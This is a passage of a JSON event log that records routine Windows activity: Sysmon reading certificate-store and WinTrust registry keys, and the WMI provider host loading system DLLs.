"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "perfts.dll", - "image_path": "C:\\Windows\\System32\\perfts.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480580000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "usbperf.dll", - "image_path": "C:\\Windows\\System32\\usbperf.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiApRpl.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiApRpl.dll", - "pid": 4292, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573480730000, - "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573482920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573483080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 